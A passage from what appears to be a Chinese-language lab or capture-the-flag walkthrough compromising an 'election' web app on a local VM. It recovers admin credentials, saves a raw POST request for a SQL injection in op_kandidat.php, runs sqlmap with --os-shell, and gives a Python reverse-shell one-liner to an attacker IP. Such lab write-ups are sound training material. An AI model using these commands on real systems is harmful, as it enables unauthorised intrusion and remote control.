

是一段二进制。

经过两次二进制转换得到一组凭据。
user:1234
pass:Zxc123!@#
不是ssh账号,也不是phpmyadmin账号。
查缺补漏
http://192.168.30.128/election/admin/
这里输入1什么都没反应,我突然意识到这里的用户名是一段数字。
意识到这是个登录页。

登录系统后台

SQL注入
https://www.exploit-db.com/exploits/48122

出现在编辑候选人表单的请求中。

保存request.txt
POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Host: 192.168.30.128
Content-Length: 16
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.30.128
Referer: http://192.168.30.128/election/admin/kandidat.php?_
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: el_mass_adding=false; el_listing_siswa=5; el_listing_guru=5; el_listing_panitia=5; PHPSESSID=vhs5rhm2r9a7spttf334b8j074; el_lang=en-us
Connection: keep-alive
aksi=fetch&id=76
sqlmap
sqlmap -r request.txt --level=5 --risk=3 --os-shell -p id

反弹shell
export RHOST="192.168.30.131";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'



































